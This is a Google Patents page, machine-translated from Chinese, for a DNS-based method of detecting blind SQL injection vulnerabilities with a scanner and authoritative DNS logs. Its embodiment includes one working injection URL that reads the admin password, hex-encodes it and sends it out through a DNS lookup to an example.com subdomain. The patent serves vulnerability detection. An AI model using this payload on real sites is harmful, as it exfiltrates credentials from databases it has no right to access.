CN109347805A - It is a kind of based on DNS without echo SQL injection detection method - Google Patents

It is a kind of based on DNS without echo SQL injection detection method Download PDF

Info

Publication number
CN109347805A
CN109347805A CN201811096610.0A CN201811096610A CN109347805A CN 109347805 A CN109347805 A CN 109347805A CN 201811096610 A CN201811096610 A CN 201811096610A CN 109347805 A CN109347805 A CN 109347805A
Authority
CN
China
Prior art keywords
dns server
dns
sql injection
request
authoritative
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201811096610.0A
Other languages
Chinese (zh)
Other versions
CN109347805B (en
Inventor
应臣伟
范渊
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Hangzhou Dbappsecurity Technology Co Ltd
Original Assignee
Hangzhou Dbappsecurity Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Hangzhou Dbappsecurity Technology Co Ltd filed Critical Hangzhou Dbappsecurity Technology Co Ltd
Priority to CN201811096610.0A priority Critical patent/CN109347805B/en
Publication of CN109347805A publication Critical patent/CN109347805A/en
Application granted granted Critical
Publication of CN109347805B publication Critical patent/CN109347805B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433Vulnerability analysis
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L61/00Network arrangements, protocols or services for addressing or naming
    • H04L61/45Network directories; Name-to-address mapping
    • H04L61/4505Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
    • H04L61/4511Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/02Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The present invention relates to a kind of based on DNS without echo SQL injection detection method, SQL injection scanner sends the HTTP request with detection load to targeted website, the DNS request for being directed to Authoritative DNS server is initiated after execution, returning response is to targeted website after Authoritative DNS server parsing, and parsing result is recorded in log, when SQL injection scanner, which initiates parsing record queries to Authoritative DNS server by HTTP request, requests, inquiry log whether there is the testing result of SQL injection loophole according to whether there is solution new record and obtain website.The present invention is detected using the dns resolution of specific coding format record without echo SQL injection, may be implemented quickly and accurately to detect loophole, reduces detection time, is improved scanner detection efficiency, is prevented from failing to report and report by mistake.

Description

It is a kind of based on DNS without echo SQL injection detection method
Technical field
The present invention relates to prevent unauthorized behavior protection computer, its component, program or data safety device skill Art field, in particular to it is a kind of to realize that quickly and effectively detection, reduction scanner exist during the SQL injection detection of no echo Rate of false alarm and rate of failing to report in SQL injection loophole based on DNS without echo SQL injection detection method.
Background technique
SQL is the computer language of a standard, for access with operating database system, SQL statement for fetching and Data in more new database.SQL can cooperate with database program, be widely used in similar Microsoft In Access, DB2, Informix, Microsoft SQL Server, Oracle, Sybase and other Database Systems.
However, causing SQL injection loophole generally existing since developer is unreasonable using SQL statement.SQL injection leakage Hole is the security breaches for betiding the database layer of application program, is to inject SQL among the character string of input to refer in brief It enables, inspection is ignored in poorly designed program, then the instruction that these injections are entered will be by database server misidentification It is run to be normal SQL instruction, therefore system is destroyed or invaded.
In the prior art, SQL injection detection is also conventional one of detection mode.According to the type of detection load, SQL note Enter loophole detection mode include blind note based on boolean, time-based blind note, the SQL injection based on mistake, based on union The types such as SQL injection, wherein the inspection such as the blind note based on boolean, the SQL injection based on mistake, SQL injection based on union Survey method is usually used in the detection for having the SQL injection loophole of echo, and time-based blind note is usually used in the SQL injection leakage of no echo Hole detection.
The detection methods such as the blind note based on boolean, the SQL injection based on mistake, the SQL injection based on union were detecting Different detection load are sent in journey, generate different http response packets, and page analysis is carried out to these different response bags, is judged whether There are loopholes;And for the SQL injection loophole of no echo, the request packet of different loads is sent, response bag is the same, according to Page analysis as a result, SQL loophole is not present, cause SQL loophole to fail to report.
Time-based blind note detection method sends different detection load requests in the detection process, will lead to target network Delay of standing responds, and time of this delay is determined by the request of detection load, is judged whether according to the different response times There are SQL loopholes, therefore time-based blind note can be used for the SQL Hole Detection of no echo;But in the actual process, due to Uncontrollable reason such as network quality, causes HTTP data packet to cause unnecessary time delay in transmission process, causes to make A large amount of wrong reports are easily generated when detecting the SQL injection loophole without echo with time-based blind note.
Summary of the invention
In order to solve the problems in the existing technology, the present invention provides a kind of the infusing without echo SQL based on DNS of optimization Enter detection method.
The technical scheme adopted by the invention is that it is a kind of based on DNS without echo SQL injection detection method, the method The following steps are included:
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website;
Step 2: the detection load enters database server by targeted website, detects the detection code quilt in load Database executes the DNS request concurrently risen for Authoritative DNS server;
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded In log;
Step 4: judging whether SQL injection scanner passes through HTTP request and look into Authoritative DNS server initiation parsing result Request is ask, if so, carry out in next step, otherwise, return step 1;
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log, parsing is remembered if it exists Record indicates that there are SQL injection loopholes for website, are otherwise not present SQL injection loophole, returns to SQL injection detection result.
It preferably, include in SQL injection scanner in the step 2, in DNS request for detecting the special of SQL loophole Character string.
Preferably, in the step 3, Authoritative DNS server parsing for Authoritative DNS server DNS request include with Lower step:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server initiation for turning to default DNS server is looked into Ask request;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server is initiated DNS to Authoritative DNS server with Authoritative DNS server address again and is looked into Ask request;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to defaulting DNS service Device completes the parsing of DNS request.
The present invention provides a kind of optimizations based on DNS without echo SQL injection detection method, is scanned by SQL injection Device sends the HTTP request with detection load to targeted website, and the DNS request for being directed to Authoritative DNS server is initiated after execution, Returning response is to targeted website after Authoritative DNS server parsing, and parsing result is recorded in log, when SQL injection scans When device initiates parsing record queries request to Authoritative DNS server by HTTP request, inquiry log, according to whether there is parsing Record, which obtains website, whether there is the testing result of SQL injection loophole.The present invention is recorded using the dns resolution of specific coding format It detects without echo SQL injection, during the SQL injection detection for solving no echo, blind note based on boolean, based on mistake SQL injection, the SQL injection detection means bring based on union fail to report problem and time-based blind note detection means is brought Wrong report problem, may be implemented quickly and accurately to detect loophole, reduce detection time, improve scanner detection efficiency, anti-leak-stopping Report and wrong report.
Detailed description of the invention
Fig. 1 is flow chart of the invention.
Specific embodiment
The present invention is described in further detail below with reference to embodiment, but protection scope of the present invention is not limited to This.
The present invention relates to a kind of based on DNS without echo SQL injection detection method, and DNS is a service of internet, As a distributed data base for mutually mapping domain name and IP address, can make one more easily to access internet, with DNS Parsing obtains the corresponding conversion of domain name and IP address, is completed by dns server.
There are a SQL to infuse for the targeted website for being parsed and being detected using authoritative DNS with exmaple.com this domain name For entering loophole, it the described method comprises the following steps.
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website.
In the present invention, the embodiment of HTTP request is provided:
Http:// example.com/sqli.php? id=1union select1,2, load_file (CONCAT (' Dns_sqli_', (SELECT hex (pass) FROM test.test_user WHERE name='admin'LIMIT 1),'.example.com\abc'))。
Step 2: the detection load enters database server by targeted website, detects the detection code quilt in load Database executes the DNS request concurrently risen for Authoritative DNS server.
It include in SQL injection scanner in the step 2, in DNS request for detecting the special string of SQL loophole.
In the present invention, for Authoritative DNS server DNS request such as: dns_sqli_password.example.com; Special string such as dns_sqli_password.
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded In log.
In the step 3, Authoritative DNS server parsing for Authoritative DNS server DNS request the following steps are included:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server initiation for turning to default DNS server is looked into Ask request;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server is initiated DNS to Authoritative DNS server with Authoritative DNS server address again and is looked into Ask request;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to defaulting DNS service Device completes the parsing of DNS request.
In the present invention, enabling this DNS request is test.example.com, since parent dns server is not The resolution server of example.com, therefore test.example.com can not be parsed, but be their ability to parse Test.example.com is the subdomain of example.com, while parent DNS can parse the authoritative DNS clothes of example.com Business device address, then parent dns server returns to authoritative dns server address to default DNS server, default DNS server The DNS query request that test.example.com is carried out to Authoritative DNS server is re-initiated, Authoritative DNS server parses DNS It requests and returns to the correct IP address of test.example.com to default DNS server.
Step 4: judging whether SQL injection scanner passes through HTTP request and look into Authoritative DNS server initiation parsing result Request is ask, if so, carry out in next step, otherwise, return step 1;
In the present invention, inquiry request as: inquiry Authoritative DNS server is with the presence or absence of comprising " dns_sqli_ " character string Request.
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log, parsing is remembered if it exists Record indicates that there are SQL injection loopholes for website, are otherwise not present SQL injection loophole, returns to SQL injection detection result.
The present invention sends the HTTP request with detection load to targeted website by SQL injection scanner, sends out after execution The DNS request for Authoritative DNS server is played, returning response, and will parsing knot to targeted website after Authoritative DNS server parsing Fruit is recorded in log, when SQL injection scanner initiates parsing record queries request to Authoritative DNS server by HTTP request When, inquiry log whether there is the testing result of SQL injection loophole according to whether there is solution new record and obtain website.The present invention It is detected using the dns resolution of specific coding format record without echo SQL injection, solves the SQL injection detection mistake of no echo Cheng Zhong, the blind note based on boolean, the SQL injection based on mistake, the SQL injection detection means bring based on union are failed to report and are asked Topic and time-based blind note detection means bring report problem by mistake, may be implemented quickly and accurately to detect loophole, reduce detection Time improves scanner detection efficiency, prevents from failing to report and report by mistake.

Claims (3)

1. it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the described method comprises the following steps:
Step 1:SQL injects scanner and sends the HTTP request with detection load to targeted website;
Step 2: the detection load enters database server by targeted website, detects the detection code in load by data Library executes the DNS request concurrently risen for Authoritative DNS server;
Step 3: Authoritative DNS server parses the DNS request and returning response to targeted website, and parsing result is recorded in day In will;
Step 4: judging whether SQL injection scanner passes through HTTP request and ask to Authoritative DNS server initiation parsing result inquiry It asks, if so, carry out in next step, otherwise, return step 1;
Step 5: Authoritative DNS server responds the inquiry request of SQL injection scanner, and inquiry log parses record sheet if it exists Show that there are SQL injection loopholes for website, SQL injection loophole is otherwise not present, returns to SQL injection detection result.
2. it is according to claim 1 it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the step It include in SQL injection scanner in DNS request for detecting the special string of SQL loophole in rapid 2.
3. it is according to claim 1 it is a kind of based on DNS without echo SQL injection detection method, it is characterised in that: the step In rapid 3, Authoritative DNS server parsing for Authoritative DNS server DNS request the following steps are included:
Step 3.1: the DNS request reaches default DNS server;
Step 3.2: default DNS server can not parse, and the parent dns server for turning to default DNS server, which initiates inquiry, asks It asks;
Step 3.3: parent dns server parses to obtain Authoritative DNS server address according to the DNS request;
Step 3.4: parent dns server returns to authoritative dns server address to default DNS server;
Step 3.5: default DNS server, which initiates DNS query to Authoritative DNS server with Authoritative DNS server address again, asks It asks;
Step 3.6: Authoritative DNS server parses the DNS request and returns to correct IP address to default DNS server, complete At the parsing of DNS request.
CN201811096610.0A 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method Active CN109347805B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811096610.0A CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201811096610.0A CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Publications (2)

Publication Number Publication Date
CN109347805A true CN109347805A (en) 2019-02-15
CN109347805B CN109347805B (en) 2021-06-15

Family

ID=65305552

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201811096610.0A Active CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Country Status (1)

Country Link
CN (1) CN109347805B (en)

Cited By (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN111597559A (en) * 2020-05-15 2020-08-28 北京铭图天成信息技术有限公司 Method, device, equipment and storage medium for detecting system command injection vulnerability
CN111600885A (en) * 2020-05-15 2020-08-28 北京铭图天成信息技术有限公司 SQL injection vulnerability detection method and device, equipment and storage medium
CN111953638A (en) * 2019-05-17 2020-11-17 北京京东尚科信息技术有限公司 Network attack behavior detection method and device and readable storage medium
CN113987521A (en) * 2021-12-28 2022-01-28 北京安华金和科技有限公司 Scanning processing method and device for database bugs
CN114143047A (en) * 2021-11-17 2022-03-04 湖北天融信网络安全技术有限公司 Vulnerability detection method and device, terminal equipment, Web server and storage medium
CN114157452A (en) * 2021-11-12 2022-03-08 湖北天融信网络安全技术有限公司 XXE vulnerability detection method and system based on HTTP connection platform

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7657540B1 (en) * 2003-02-04 2010-02-02 Seisint, Inc. Method and system for linking and delinking data records
CN102136051A (en) * 2011-05-06 2011-07-27 南开大学 Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model
CN105631341A (en) * 2015-12-18 2016-06-01 北京奇虎科技有限公司 Blind test method and device of bug
CN106612339A (en) * 2015-10-27 2017-05-03 中国电信股份有限公司 Domain name updating method, system and main DNS (Domain Name System) server
CN106790195A (en) * 2016-12-30 2017-05-31 北京神州绿盟信息安全科技股份有限公司 A kind of SQL injection detection method and device
CN108509792A (en) * 2017-02-23 2018-09-07 腾讯科技(深圳)有限公司 A kind of injection loophole detection method and device

Patent Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7657540B1 (en) * 2003-02-04 2010-02-02 Seisint, Inc. Method and system for linking and delinking data records
CN102136051A (en) * 2011-05-06 2011-07-27 南开大学 Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model
CN106612339A (en) * 2015-10-27 2017-05-03 中国电信股份有限公司 Domain name updating method, system and main DNS (Domain Name System) server
CN105631341A (en) * 2015-12-18 2016-06-01 北京奇虎科技有限公司 Blind test method and device of bug
CN106790195A (en) * 2016-12-30 2017-05-31 北京神州绿盟信息安全科技股份有限公司 A kind of SQL injection detection method and device
CN108509792A (en) * 2017-02-23 2018-09-07 腾讯科技(深圳)有限公司 A kind of injection loophole detection method and device

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
AFANT1: "巧用DNSlog实现无回显注入", 《HTTPS://WWW.CNBLOGS.COM/AFANTI/P/8047530.HTML》 *

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN111953638A (en) * 2019-05-17 2020-11-17 北京京东尚科信息技术有限公司 Network attack behavior detection method and device and readable storage medium
CN111953638B (en) * 2019-05-17 2023-06-27 北京京东尚科信息技术有限公司 Network attack behavior detection method and device and readable storage medium
CN111597559A (en) * 2020-05-15 2020-08-28 北京铭图天成信息技术有限公司 Method, device, equipment and storage medium for detecting system command injection vulnerability
CN111600885A (en) * 2020-05-15 2020-08-28 北京铭图天成信息技术有限公司 SQL injection vulnerability detection method and device, equipment and storage medium
CN111597559B (en) * 2020-05-15 2023-10-13 北京铭图天成信息技术有限公司 System command injection vulnerability detection method and device, equipment and storage medium
CN114157452A (en) * 2021-11-12 2022-03-08 湖北天融信网络安全技术有限公司 XXE vulnerability detection method and system based on HTTP connection platform
CN114143047A (en) * 2021-11-17 2022-03-04 湖北天融信网络安全技术有限公司 Vulnerability detection method and device, terminal equipment, Web server and storage medium
CN113987521A (en) * 2021-12-28 2022-01-28 北京安华金和科技有限公司 Scanning processing method and device for database bugs

Also Published As

Publication number Publication date
CN109347805B (en) 2021-06-15

Similar Documents

Publication Publication Date Title
CN109347805A (en) It is a kind of based on DNS without echo SQL injection detection method
CN103744802B (en) Method and device for identifying SQL injection attacks
CN102546576B (en) A kind of web page horse hanging detects and means of defence, system and respective code extracting method
US8949990B1 (en) Script-based XSS vulnerability detection
Jang et al. Detecting SQL injection attacks using query result size
CN108989355B (en) Vulnerability detection method and device
CN103279710B (en) Method and system for detecting malicious codes of Internet information system
US9436730B2 (en) Methods and systems for validating input data
US8528093B1 (en) Apparatus and method for performing dynamic security testing using static analysis data
CN101964025A (en) XSS (Cross Site Scripting) detection method and device
CN102156832B (en) Security defect detection method for Firefox expansion
CN107832622B (en) Leak detection method, device, computer equipment and storage medium
CN105046150A (en) Method and system for preventing structured query language (SQL) implantation
Gupta et al. XSS‐immune: a Google chrome extension‐based XSS defensive framework for contemporary platforms of web applications
CN106713318B (en) WEB site safety protection method and system
CN101895516A (en) Method and device for positioning cross-site scripting attack source
WO2017063274A1 (en) Method for automatically determining malicious-jumping and malicious-nesting offensive websites
CN102970282A (en) Website security detection system
Li et al. The application of fuzzing in web software security vulnerabilities test
CN103001946A (en) Website security detection method, website security detection equipment and website security detection system
CN105404816A (en) Content-based vulnerability detection method and device
CN113961930A (en) SQL injection vulnerability detection method and device and electronic equipment
Choi et al. HXD: Hybrid XSS detection by using a headless browser
CN108282446A (en) Identify the method and apparatus of scanner
Harefa et al. Sea waf: The prevention of sql injection attacks on web applications

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant